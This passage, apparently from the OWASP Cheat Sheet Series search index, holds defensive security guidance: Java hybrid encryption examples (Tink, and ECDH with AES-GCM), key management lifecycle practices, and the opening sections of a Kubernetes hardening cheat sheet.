{\n\nHybridDecrypt decryptor = privateKey.getPrimitive(HybridDecrypt.class);\n\n// return the encrypted value\nreturn new String(decryptor.decrypt(ciphertext, metadata.getBytes(UTF_8)),UTF_8);\n}\n\n\n}\n
"},{"location":"cheatsheets/Java_Security_Cheat_Sheet.html#asymmetric-example-using-built-in-jcajce-classes","title":"Asymmetric example using built-in JCA/JCE classes","text":"

If you absolutely cannot use a separate library, it is still possible to use the built JCA/JCE classes but it is strongly recommended to have a cryptography expert review the full design and code, as even the most trivial error can severely weaken your encryption.

The following code snippet shows an example of using Eliptic Curve/Diffie Helman (ECDH) together with AES-GCM to perform encryption/decryption of data between two different sides without the need the transfer the symmetric key between the two sides. Instead, the sides exchange public keys and can then use ECDH to generate a shared secret which can be used for the symmetric encryption.

Note that this code sample relies on the AesGcmSimple class from the previous section.

A few constraints/pitfalls with this code:

Click here to view the \"JCA/JCE hybrid encryption\" code snippet.
import java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport javax.crypto.spec.*;\nimport javax.crypto.*;\nimport java.util.*;\nimport java.security.*;\nimport java.security.spec.*;\nimport java.util.Arrays;\n\n// ECDHSimpleTest\nclass Main {\npublic static void main(String[] args) throws Exception {\n\n// Generate ECC key pair for Alice\nvar alice = new ECDHSimple();\nKey alicePublicKey = alice.getPublicKey();\n\n// Generate ECC key pair for Bob\nvar bob = new ECDHSimple();\nKey bobPublicKey = bob.getPublicKey();\n\n// This keypair generation shoud be reperformed every so often in order to \n// obtain a new shared secret to avoid a long lived shared secret.\n\n// Alice encrypts a message to send to Bob\nString plaintext = \"Hello\"; //, Bob!\";\nSystem.out.println(\"Secret being sent from Alice to Bob: \" + plaintext);\n\nvar retPair = alice.encrypt(bobPublicKey, plaintext);\nvar nonce = retPair.getKey();\nvar cipherText = retPair.getValue();\n\nSystem.out.println(\"Both cipherText and nonce being sent from Alice to Bob: \" + Base64.getEncoder().encodeToString(cipherText) + \" \" + Base64.getEncoder().encodeToString(nonce));\n\n\n// Bob decrypts the message\nvar decrypted = bob.decrypt(alicePublicKey, cipherText, nonce);\nSystem.out.println(\"Secret received by Bob from Alice: \" + decrypted);\nSystem.out.println();\n\n// Bob encrypts a message to send to Alice\nString plaintext2 = \"Hello\"; //, Alice!\";\nSystem.out.println(\"Secret being sent from Bob to Alice: \" + plaintext2);\n\nvar retPair2 = bob.encrypt(alicePublicKey, plaintext2);\nvar nonce2 = retPair2.getKey();\nvar cipherText2 = retPair2.getValue();\nSystem.out.println(\"Both cipherText2 and nonce2 being sent from Bob to Alice: \" + Base64.getEncoder().encodeToString(cipherText2) + \" \" + Base64.getEncoder().encodeToString(nonce2));\n\n// Bob decrypts the message\nvar decrypted2 = alice.decrypt(bobPublicKey, cipherText2, nonce2);\nSystem.out.println(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n}\nclass ECDHSimple {\nprivate KeyPair keyPair;\n\npublic class AesKeyNonce {\npublic SecretKey Key;\npublic byte[] Nonce;\n}\n\npublic ECDHSimple() throws Exception {\nKeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance(\"EC\");\nECGenParameterSpec ecSpec = new ECGenParameterSpec(\"secp256r1\"); // Using secp256r1 curve\nkeyPairGenerator.initialize(ecSpec);\nkeyPair = keyPairGenerator.generateKeyPair();\n}\n\npublic Key getPublicKey() {\nreturn keyPair.getPublic();\n}\n\npublic AbstractMap.SimpleEntry<byte[], byte[]> encrypt(Key partnerPublicKey, String message) throws Exception {\n\n// Generate the AES Key and Nonce\nAesKeyNonce aesParams = generateAESParams(partnerPublicKey);\n\n// return the encrypted value\nreturn new AbstractMap.SimpleEntry<>(\naesParams.Nonce,\nAesGcmSimple.encrypt(message, aesParams.Nonce, aesParams.Key)\n);\n}\npublic String decrypt(Key partnerPublicKey, byte[] ciphertext, byte[] nonce) throws Exception {\n\n// Generate the AES Key and Nonce\nAesKeyNonce aesParams = generateAESParams(partnerPublicKey, nonce);\n\n// return the decrypted value\nreturn AesGcmSimple.decrypt(ciphertext, aesParams.Nonce, aesParams.Key);\n}\n\nprivate AesKeyNonce generateAESParams(Key partnerPublicKey, byte[] nonce) throws Exception {\n\n// Derive the secret based on this side's private key and the other side's public key \nKeyAgreement keyAgreement = KeyAgreement.getInstance(\"ECDH\");\nkeyAgreement.init(keyPair.getPrivate());\nkeyAgreement.doPhase(partnerPublicKey, true);\nbyte[] secret = keyAgreement.generateSecret();\n\nAesKeyNonce aesKeyNonce = new AesKeyNonce();\n\n// Copy first 32 bytes as the key\nbyte[] key = Arrays.copyOfRange(secret, 0, (AesGcmSimple.KEY_SIZE / 8));\naesKeyNonce.Key = new SecretKeySpec(key, 0, key.length, \"AES\");\n\n// Passed in nonce will be used.\naesKeyNonce.Nonce = nonce;\nreturn aesKeyNonce;\n\n}\n\nprivate AesKeyNonce generateAESParams(Key partnerPublicKey) throws Exception {\n\n// Nonce of 12 bytes / 96 bits and this size should always be used.\n// It is critical for AES-GCM that a unique nonce is used for every cryptographic operation.\n// Therefore this is not generated from the shared secret\nbyte[] nonce = new byte[AesGcmSimple.IV_LENGTH];\nSecureRandom random = new SecureRandom();\nrandom.nextBytes(nonce);\nreturn generateAESParams(partnerPublicKey, nonce);\n\n}\n}\n
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html","title":"Key Management Cheat Sheet","text":""},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Key Management Cheat Sheet provides developers with guidance for implementation of cryptographic key management within an application in a secure manner. It is important to document and harmonize rules and practices for:

  1. key life cycle management (generation, distribution, destruction)
  2. key compromise, recovery and zeroization
  3. key storage
  4. key agreement
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#general-guidelines-and-considerations","title":"General Guidelines and Considerations","text":"

Formulate a plan for the overall organization's cryptographic strategy to guide developers working on different applications and ensure that each application's cryptographic capability meets minimum requirements and best practices.

Identify the cryptographic and key management requirements for your application and map all components that process or store cryptographic key material.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-selection","title":"Key Selection","text":"

Selection of the cryptographic and key management algorithms to use within a given application should begin with an understanding of the objectives of the application.

For example, if the application is required to store data securely, then the developer should select an algorithm suite that supports the objective of data at rest protection security. Applications that are required to transmit and receive data would select an algorithm suite that supports the objective of data in transit protection.

We have provided recommendations on the selection of crypto suites within an application based on application and security objectives. Application developers oftentimes begin the development of crypto and key management capabilities by examining what is available in a library.

However, an analysis of the real needs of the application should be conducted to determine the optimal key management approach. Begin by understanding the security objectives of the application which will then drive the selection of cryptographic protocols that are best suited. For example, the application may require:

  1. Confidentiality of data at rest and confidentiality of data in transit.
  2. Authenticity of the end device.
  3. Authenticity of data origin.
  4. Integrity of data in transit.
  5. Keys to create the data encryption keys.

Once the understanding of the security needs of the application is achieved, developers can determine what protocols and algorithms are required. Once the protocols and algorithms are understood, you can begin to define the different types of keys that will support the application's objectives.

There are a diverse set of key types and certificates to consider, for example:

  1. Encryption: Symmetric encryption keys, Asymmetric encryption keys (public and private).
  2. Authentication of End Devices: Pre-shared symmetric keys, Trusted certificates, Trust Anchors.
  3. Data Origin Authentication: HMAC.
  4. Integrity Protection: Message Authentication Codes (MACs).
  5. Key Encryption Keys.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#algorithms-and-protocols","title":"Algorithms and Protocols","text":"

According to NIST SP 800-57 Part 1, many algorithms and schemes that provide a security service use a hash function as a component of the algorithm.

Hash functions can be found in digital signature algorithms (FIPS186), Keyed-Hash Message Authentication Codes (HMAC) (FIPS198), key-derivation functions/methods (NIST Special Publications (SP) 800-56A, 800-56B, 800-56C and 800-108), and random number generators (NIST SP 800-90A). Approved hash functions are defined in FIPS180.

NIST SP 800-57 Part 1 recognizes three basic classes of approved cryptographic algorithms: hash functions, symmetric- key algorithms and asymmetric-key algorithms. The classes are defined by the number of cryptographic keys that are used in conjunction with the algorithm.

The NSA released a report, Commercial National Security Algorithm Suite 2.0 which lists the cryptographic algorithms that are expected to be remain strong even with advances in quantum computing.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-hash-functions","title":"Cryptographic hash functions","text":"

Cryptographic hash functions do not require keys. Hash functions generate a relatively small digest (hash value) from a (possibly) large input in a way that is fundamentally difficult to reverse (i.e., it is hard to find an input that will produce a given output). Hash functions are used as building blocks for key management, for example,

  1. To provide data authentication and integrity services (Section 4.2.3) \u2013 the hash function is used with a key to generate a message authentication code.
  2. To compress messages for digital signature generation and verification (Section 4.2.4).
  3. To derive keys in key-establishment algorithms (Section 4.2.5).
  4. To generate deterministic random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#symmetric-key-algorithms","title":"Symmetric-key algorithms","text":"

Symmetric-key algorithms (sometimes known as secret-key algorithms) transform data in a way that is fundamentally difficult to undo without knowledge of a secret key. The key is \"symmetric\" because the same key is used for a cryptographic operation and its inverse (e.g., encryption and decryption).

Symmetric keys are often known by more than one entity; however, the key shall not be disclosed to entities that are not authorized access to the data protected by that algorithm and key. Symmetric key algorithms are used, for example,

  1. To provide data confidentiality (Section 4.2.2); the same key is used to encrypt and decrypt data.
  2. To provide authentication and integrity services (Section 4.2.3) in the form of Message Authentication Codes (MACs); the same key is used to generate the MAC and to validate it. MACs normally employ either a symmetric key-encryption algorithm or a cryptographic hash function as their cryptographic primitive.
  3. As part of the key-establishment process (Section 4.2.5).
  4. To generate deterministic random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#asymmetric-key-algorithms","title":"Asymmetric-key algorithms","text":"

Asymmetric-key algorithms, commonly known as public-key algorithms, use two related keys (i.e., a key pair) to perform their functions: a public key and a private key. The public key may be known by anyone; the private key should be under the sole control of the entity that \"owns\" the key pair. Even though the public and private keys of a key pair are related, knowledge of the public key does not reveal the private key. Asymmetric algorithms are used, for example,

  1. To compute digital signatures (Section 4.2.4).
  2. To establish cryptographic keying material (Section 4.2.5).
  3. To generate random numbers (Section 4.2.7).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#message-authentication-codes-macs","title":"Message Authentication Codes (MACs)","text":"

Message Authentication Codes (MACs) provide data authentication and integrity. A MAC is a cryptographic checksum on the data that is used in order to provide assurance that the data has not changed and that the MAC was computed by the expected entity.

Although message integrity is often provided using non-cryptographic techniques known as error detection codes, these codes can be altered by an adversary to effect an action to the adversary's benefit. The use of an approved cryptographic mechanism, such as a MAC, can alleviate this problem.

In addition, the MAC can provide a recipient with assurance that the originator of the data is a key holder (i.e., an entity authorized to have the key). MACs are often used to authenticate the originator to the recipient when only those two parties share the MAC key.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#digital-signatures","title":"Digital Signatures","text":"

Digital signatures are used to provide authentication, integrity and non-repudiation. Digital signatures are used in conjunction with hash functions and are computed on data of any length (up to a limit that is determined by the hash function).

FIPS186 specifies algorithms that are approved for the computation of digital signatures.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-encryption-keys","title":"Key Encryption Keys","text":"

Symmetric key-wrapping keys are used to encrypt other keys using symmetric-key algorithms. Key-wrapping keys are also known as key encrypting keys.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-strength","title":"Key Strength","text":"

Review NIST SP 800-57 (Recommendation for Key Management) for recommended guidelines on key strength for specific algorithm implementations. Also, consider these best practices:

  1. Establish what the application's minimum computational resistance to attack should be. Understanding the minimum computational resistance to attack should take into consideration the sophistication of your adversaries, how long data needs to be protected, where data is stored and if it is exposed. Identifying the computational resistance to attack will inform engineers as to the minimum length of the cryptographic key required to protect data over the life of that data. Consult NIST SP 800-131a for additional guidance on determining the appropriate key lengths for the algorithm of choice.
  2. When encrypting keys for storage or distribution, always encrypt a cryptographic key with another key of equal or greater cryptographic strength.
  3. When moving to Elliptic Curve-based algorithms, choose a key length that meets or exceeds the comparative strength of other algorithms in use within your system. Refer to NIST SP 800-57 Table 2.
  4. Formulate a strategy for the overall organization's cryptographic strategy to guide developers working on different applications and ensure that each application's cryptographic capability meets minimum requirements and best practices.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#memory-management-considerations","title":"Memory Management Considerations","text":"

Keys stored in memory for a long time can become \"burned in\". This can be mitigated by splitting the key into components that are frequently updated. NIST SP 800.57).

Loss or corruption of the memory media on which keys and/or certificates are stored, and recovery planning, according to NIST SP 800.57.

Plan for the recovery from possible corruption of the memory media necessary for key or certificate generation, registration, and/or distribution systems, subsystems, or components as recommended in NIST SP 800.57.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#perfect-forward-secrecy","title":"Perfect Forward Secrecy","text":"

Ephemeral keys can provide perfect forward secrecy protection, which means a compromise of the server's long term signing key does not compromise the confidentiality of past sessions. Refer to TLS cheat sheet.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-usage","title":"Key Usage","text":"

According to NIST, in general, a single key should be used for only one purpose (e.g., encryption, authentication, key wrapping, random number generation, or digital signatures).

There are several reasons for this:

  1. The use of the same key for two different cryptographic processes may weaken the security provided by one or both of the processes.
  2. Limiting the use of a key limits the damage that could be done if the key is compromised.
  3. Some uses of keys interfere with each other. For example, the length of time the key may be required for each use and purpose. Retention requirements of the data may differ for different data types.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-module-topics","title":"Cryptographic Module Topics","text":"

According to NIST SP800-133, cryptographic modules are the set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic module boundary to provide protection of the keys.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-management-lifecycle-best-practices","title":"Key Management Lifecycle Best Practices","text":""},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#generation","title":"Generation","text":"

Cryptographic keys shall be generated within cryptographic module with at least a FIPS 140-2 compliance. For explanatory purposes, consider the cryptographic module in which a key is generated to be the key-generating module.

Any random value required by the key-generating module shall be generated within that module; that is, the Random Bit Generator that generates the random value shall be implemented within cryptographic module with at least a FIPS 140-2 compliance that generates the key.

Hardware cryptographic modules are preferred over software cryptographic modules for protection.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#distribution","title":"Distribution","text":"

The generated keys shall be transported (when necessary) using secure channels and shall be used by their associated cryptographic algorithm within at least a FIPS 140-2 compliant cryptographic modules. For additional detail for the recommendations in this section refer to NIST Special Paper 800-133.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#storage","title":"Storage","text":"
  1. Developers must understand where cryptographic keys are stored within the application. Understand what memory devices the keys are stored on.
  2. Keys must be protected on both volatile and persistent memory, ideally processed within secure cryptographic modules.
  3. Keys should never be stored in plaintext format.
  4. Ensure all keys are stored in cryptographic vault, such as a hardware security module (HSM) or isolated cryptographic service.
  5. If you are planning on storing keys in offline devices/databases, then encrypt the keys using Key Encryption Keys (KEKs) prior to the export of the key material. KEK length (and algorithm) should be equivalent to or greater in strength than the keys being protected.
  6. Ensure that keys have integrity protections applied while in storage (consider dual purpose algorithms that support encryption and Message Code Authentication (MAC)).
  7. Ensure that standard application level code never reads or uses cryptographic keys in any way and use key management libraries.
  8. Ensure that keys and cryptographic operation is done inside the sealed vault.
  9. All work should be done in the vault (such as key access, encryption, decryption, signing, etc).
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#escrow-and-backup","title":"Escrow and Backup","text":"

Data that has been encrypted with lost cryptographic keys will never be recovered. Therefore, it is essential that the application incorporate a secure key backup capability, especially for applications that support data at rest encryption for long-term data stores.

When backing up keys, ensure that the database that is used to store the keys is encrypted using at least a FIPS 140-2 validated module. It is sometimes useful to escrow key material for use in investigations and for re-provisioning of key material to users in the event that the key is lost or corrupted.

Never escrow keys used for performing digital signatures, but consider the need to escrow keys that support encryption. Oftentimes, escrow can be performed by the Certificate Authority (CA) or key management system that provisions certificates and keys, however in some instances separate APIs must be implemented to allow the system to perform the escrow for the application.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#accountability-and-audit","title":"Accountability and Audit","text":"

Accountability involves the identification of those that have access to, or control of, cryptographic keys throughout their lifecycles. Accountability can be an effective tool to help prevent key compromises and to reduce the impact of compromises once they are detected.

Although it is preferred that no humans are able to view keys, as a minimum, the key management system should account for all individuals who are able to view plaintext cryptographic keys.

In addition, more sophisticated key-management systems may account for all individuals authorized to access or control any cryptographic keys, whether in plaintext or ciphertext form.

Accountability provides three significant advantages:

  1. It aids in the determination of when the compromise could have occurred and what individuals could have been involved.
  2. It tends to protect against compromise, because individuals with access to the key know that their access to the key is known.
  3. It is very useful in recovering from a detected key compromise to know where the key was used and what data or other keys were protected by the compromised key.

Certain principles have been found to be useful in enforcing the accountability of cryptographic keys. These principles might not apply to all systems or all types of keys.

Some of the principles that apply to long-term keys controlled by humans include:

  1. Uniquely identifying keys.
  2. Identifying the key user.
  3. Identifying the dates and times of key use, along with the data that is protected.
  4. Identifying other keys that are protected by a symmetric or private key.

Two types of audit should be performed on key management systems:

  1. The security plan and the procedures that are developed to support the plan should be periodically audited to ensure that they continue to support the Key Management Policy (NIST SP 800-57 Part 2).
  2. The protective mechanisms employed should be periodically reassessed with respect to the level of security that they provide and are expected to provide in the future, and that the mechanisms correctly and effectively support the appropriate policies.

New technology developments and attacks should be taken into consideration. On a more frequent basis, the actions of the humans that use, operate and maintain the system should be reviewed to verify that the humans continue to follow established security procedures.

Strong cryptographic systems can be compromised by lax and inappropriate human actions. Highly unusual events should be noted and reviewed as possible indicators of attempted attacks on the system.

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#key-compromise-and-recovery","title":"Key Compromise and Recovery","text":"

The compromise of a key has the following implications:

  1. In general, the unauthorized disclosure of a key used to provide confidentiality protection (i.e., via encryption) means that all information encrypted by that key could be exposed or known by unauthorized entities. The disclosure of a Certificate of Authorities's private signature key means that an adversary can create fraudulent certificates and Certificate Revocation Lists (CRLs).
  2. A compromise of the integrity of a key means that the key is incorrect - either that the key has been modified (either deliberately or accidentally), or that another key has been substituted; this includes a deletion (non-availability) of the key. The substitution or modification of a key used to provide integrity calls into question the integrity of all information protected by the key. This information could have been provided by, or changed by, an unauthorized entity that knows the key. The substitution of a public or secret key that will be used (at a later time) to encrypt data could allow an unauthorized entity (who knows the decryption key) to decrypt data that was encrypted using the encryption key.
  3. A compromise of a key's usage or application association means that the key could be used for the wrong purpose (e.g., for key establishment instead of digital signatures) or for the wrong application, and could result in the compromise of information protected by the key.
  4. A compromise of a key's association with the owner or other entity means that the identity of the other entity cannot be assured (i.e., one does not know who the other entity really is) or that information cannot be processed correctly (e.g., decrypted with the correct key).
  5. A compromise of a key's association with other information means that there is no association at all, or the association is with the wrong \"information\". This could cause the cryptographic services to fail, information to be lost, or the security of the information to be compromised. Certain protective measures may be taken in order to minimize the likelihood or consequences of a key compromise. Similar affect as ransomware, except that you can't pay the ransom and get the key back.

The following procedures are usually involved:

  1. Limiting the amount of time a symmetric or private key is in plaintext form.
  2. Preventing humans from viewing plaintext symmetric and private keys.
  3. Restricting plaintext symmetric and private keys to physically protected containers. This includes key generators, key-transport devices, key loaders, cryptographic modules, and key-storage devices.
  4. Using integrity checks to ensure that the integrity of a key or its association with other data has not been compromised. For example, keys may be wrapped (i.e., encrypted) in such a manner that unauthorized modifications to the wrapping or to the associations will be detected.
  5. Employing key confirmation (see NIST SP 800-57 Part 1 Section 4.2.5.5) to help ensure that the proper key was, in fact, established.
  6. Establishing an accountability system that keeps track of each access to symmetric and private keys in plaintext form.
  7. Providing a cryptographic integrity check on the key (e.g., using a MAC or a digital signature).
  8. The use of trusted timestamps for signed data. i. Destroying keys as soon as they are no longer needed.
  9. Creating a compromise-recovery plan, especially in the case of a CA compromise.

A compromise-recovery plan is essential for restoring cryptographic security services in the event of a key compromise. A compromise-recovery plan shall be documented and easily accessible.

The compromise-recovery plan should contain:

  1. The identification and contact info of the personnel to notify.
  2. The identification and contact info of the personnel to perform the recovery actions.
  3. The re-key method.
  4. An inventory of all cryptographic keys and their use (e.g., the location of all certificates in a system).
  5. The education of all appropriate personnel on the recovery procedures.
  6. An identification and contact info of all personnel needed to support the recovery procedures.
  7. Policies that key-revocation checking be enforced (to minimize the effect of a compromise).
  8. The monitoring of the re-keying operations (to ensure that all required operations are performed for all affected keys).
  9. Any other recovery procedures, which may include:
    1. Physical inspection of the equipment.
    2. Identification of all information that may be compromised as a result of the incident.
    3. Identification of all signatures that may be invalid, due to the compromise of a signing key.
    4. Distribution of new keying material, if required.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#trust-stores","title":"Trust Stores","text":"
  1. Design controls to secure the trust store against injection of third-party root certificates. The access controls are managed and enforced on an entity and application basis.
  2. Implement integrity controls on objects stored in the trust store.
  3. Do not allow for export of keys held within the trust store without authentication and authorization.
  4. Setup strict policies and procedures for exporting key material from applications to network applications and other components.
  5. Implement a secure process for updating the trust store.
"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#cryptographic-key-management-libraries","title":"Cryptographic Key Management Libraries","text":"

Use only reputable crypto libraries that are well maintained and updated, as well as tested and validated by third-party organizations (e.g., NIST/FIPS).

"},{"location":"cheatsheets/Key_Management_Cheat_Sheet.html#documentation","title":"Documentation","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html","title":"Kubernetes Security Cheat Sheet","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes","title":"Kubernetes","text":"

Kubernetes is an open source container orchestration engine for automating deployment, scaling, and management of containerized applications. The open source project is hosted by the Cloud Native Computing Foundation (CNCF).

When you deploy Kubernetes, you get a cluster. A Kubernetes cluster consists of a set of worker machines, called nodes that run containerized applications. The control plane manages the worker nodes and the Pods in the cluster.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#control-plane-components","title":"Control Plane Components","text":"

The control plane's components make global decisions about the cluster, as well as detecting and responding to cluster events. It consists of components such as kube-apiserver, etcd, kube-scheduler, kube-controller-manager and cloud-controller-manager

Component Description kube-apiserver kube-apiserver exposes the Kubernetes API. The API server is the front end for the Kubernetes control plane. etcd etcd is a consistent and highly-available key-value store used as Kubernetes' backing store for all cluster data. kube-scheduler kube-scheduler watches for newly created Pods with no assigned node, and selects a node for them to run on. kube-controller-manager kube-controller-manager runs controller processes. Logically, each controller is a separate process, but to reduce complexity, they are all compiled into a single binary and run in a single process. cloud-controller-manager The cloud controller manager lets you link your cluster into your cloud provider's API, and separates out the components that interact with that cloud platform from components that just interact with your cluster."},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#node-components","title":"Node Components","text":"

Node components run on every node, maintaining running pods and providing the Kubernetes runtime environment. It consists of components such as kubelet, kube-proxy and container runtime.

Component Description kubelet kubelet is an agent that runs on each node in the cluster. It makes sure that containers are running in a Pod kube-proxy kube-proxy is a network proxy that runs on each node in your cluster, implementing part of the Kubernetes Service concept Container runtime The container runtime is the software that is responsible for running containers.

This cheatsheet provides a starting point for securing Kubernetes cluster. It is divided into the following categories:

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-hosts","title":"Securing Kubernetes hosts","text":"

There are several options available to deploy Kubernetes: on bare metal, on-premise, and in the public cloud (custom Kubernetes build on virtual machines OR use a managed service). Kubernetes was designed to be highly portable and customers can easily switch between these installations, migrating their workloads.

All of this potential customisation of Kubernetes means it can be designed to fit a large variety of scenarios; however, this is also its greatest weakness when it comes to security. Kubernetes is designed out of the box to be customizable and users must turn on certain functionality to secure their cluster. This means that the engineers responsible for deploying the Kubernetes platform need to know about all the potential attack vectors and vulnerabilities poor configuration can lead to.

It is recommended to harden the underlying hosts by installing the latest version of operating system, hardening the operating system, implement necessary patch management and configuration management system, implementing essential firewall rules and undertake specific security measures depending on the datacenter environment.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#kubernetes-version","title":"Kubernetes Version","text":"

It has become impossible to track all potential attack vectors. This fact is unfortunate as there is nothing more vital than to be aware and on top of potential threats. The best defense is to make sure that you are running the latest available version of Kubernetes.

The Kubernetes project maintains release branches for the most recent three minor releases and it backports the applicable fixes, including security fixes, to those three release branches, depending on severity and feasibility. Patch releases are cut from those branches at a regular cadence, plus additional urgent releases, when required. Hence it is always recommended to upgrade the Kubernetes cluster to the latest available stable version. It is recommended to refer to the version skew policy for further details https://kubernetes.io/docs/setup/release/version-skew-policy/.

There are several techniques such as rolling updates, and node pool migrations that allow you to complete an update with minimal disruption and downtime.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#securing-kubernetes-components","title":"Securing Kubernetes components","text":""},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#control-network-access-to-sensitive-ports","title":"Control network access to sensitive ports","text":"

Kubernetes clusters usually listen on a range of well-defined and distinctive ports which makes it easier identify the clusters and attack them. Hence it is highly recommended to configure authentication and authorization on the cluster and cluster nodes.

Here is an overview of the default ports used in Kubernetes. Make sure that your network blocks access to ports and consider limiting access to the Kubernetes API server except from trusted networks.

Master node(s):

Protocol Port Range Purpose TCP 6443- Kubernetes API Server TCP 2379-2380 etcd server client API TCP 10250 Kubelet API TCP 10251 kube-scheduler TCP 10252 kube-controller-manager TCP 10255 Read-Only Kubelet API

Worker nodes:

Protocol Port Range Purpose TCP 10250 Kubelet API TCP 10255 Read-Only Kubelet API TCP 30000-32767 NodePort Services"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#limit-direct-access-to-kubernetes-nodes","title":"Limit Direct Access to Kubernetes Nodes","text":"

You should limit SSH access to Kubernetes nodes, reducing the risk for unauthorized access to host resource. Instead you should ask users to use \"kubectl exec\", which will provide direct access to the container environment without the ability to access the host.

You can use Kubernetes Authorization Plugins to further control user access to resources. This allows defining fine-grained-access control rules for specific namespace, containers and operations.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#controlling-access-to-the-kubernetes-api","title":"Controlling access to the Kubernetes API","text":"

The Kubernetes platform is controlled using API requests and as such is the first line of defense against attackers. Controlling who has access and what actions they are allowed to perform is the primary concern. For more information, refer to the documentation at https://kubernetes.io/docs/reference/access-authn-authz/controlling-access/.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#use-transport-layer-security","title":"Use Transport Layer Security","text":"

Communication in the cluster between services should be handled using TLS, encrypting all traffic by default. This, however, is often overlooked with the thought being that the cluster is secure and there is no need to provide encryption in transit within the cluster.

Advances in network technology, such as the service mesh, have led to the creation of products like LinkerD and Istio which can enable TLS by default while providing extra telemetry information on transactions between services.

Kubernetes expects that all API communication in the cluster is encrypted by default with TLS, and the majority of installation methods will allow the necessary certificates to be created and distributed to the cluster components. Note that some components and installation methods may enable local ports over HTTP and administrators should familiarize themselves with the settings of each component to identify potentially unsecured traffic.

To learn more on usage of TLS in Kubernetes cluster, refer to the documentation at https://kubernetes.io/blog/2018/07/18/11-ways-not-to-get-hacked/#1-tls-everywhere.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#api-authentication","title":"API Authentication","text":"

Kubernetes provides a number of in-built mechanisms for API server authentication, however these are likely only suitable for non-production or small clusters.

The recommended approach for larger or production clusters, is to use an external authentication method:

In addition to choosing the appropriate authentication system, API access should be considered privileged and use Multi-Factor Authentication (MFA) for all user access.

For more information, consult Kubernetes authentication reference document at https://kubernetes.io/docs/reference/access-authn-authz/authentication

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#api-authorization-implement-role-based-access-control","title":"API Authorization - Implement role-based access control","text":"

In Kubernetes, you must be authenticated (logged in) before your request can be authorized (granted permission to access). Kubernetes expects attributes that are common to REST API requests. This means that Kubernetes authorization works with existing organization-wide or cloud-provider-wide access control systems which may handle other APIs besides the Kubernetes API.

Kubernetes authorizes API requests using the API server. It evaluates all of the request attributes against all policies and allows or denies the request. All parts of an API request must be allowed by some policy in order to proceed. This means that permissions are denied by default.

Role-based access control (RBAC) is a method of regulating access to computer or network resources based on the roles of individual users within your organization.

Kubernetes ships an integrated Role-Based Access Control (RBAC) component that matches an incoming user or group to a set of permissions bundled into roles. These permissions combine verbs (get, create, delete) with resources (pods, services, nodes) and can be namespace or cluster scoped. A set of out of the box roles are provided that offer reasonable default separation of responsibility depending on what actions a client might want to perform. It is recommended that you use the Node and RBAC authorizers together, in combination with the NodeRestriction admission plugin.

RBAC authorization uses the rbac.authorization.k8s.io API group to drive authorization decisions, allowing you to dynamically configure policies through the Kubernetes API. To enable RBAC, start the API server with the --authorization-mode flag set to a comma-separated list that includes RBAC; for example:

kube-apiserver --authorization-mode=Example,RBAC --other-options --more-options\n

For detailed examples of utilizing RBAC, refer to Kubernetes documentation at https://kubernetes.io/docs/reference/access-authn-authz/rbac

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#restrict-access-to-etcd","title":"Restrict access to etcd","text":"

etcd is a critical Kubernetes component which stores information on state and secrets, and it should be protected differently from the rest of your cluster. Write access to the API server's etcd is equivalent to gaining root on the entire cluster, and even read access can be used to escalate privileges fairly easily.

The Kubernetes scheduler will search etcd for pod definitions that do not have a node. It then sends the pods it finds to an available kubelet for scheduling. Validation for submitted pods is performed by the API server before it writes them to etcd, so malicious users writing directly to etcd can bypass many security mechanisms - e.g. PodSecurityPolicies.

Administrators should always use strong credentials from the API servers to their etcd server, such as mutual auth via TLS client certificates, and it is often recommended to isolate the etcd servers behind a firewall that only the API servers may access.

"},{"location":"cheatsheets/Kubernetes_Security_Cheat_Sheet.html#caution","title":"Caution","text":"

Allowing other components within the cluster to access the master etcd instance with read or write access to the full keyspace is equivalent to granting cluster-admin access. Using separate etcd instances for non-master components or using etcd ACLs to restrict read and write access to a subset of the keyspace is strongly recommended.

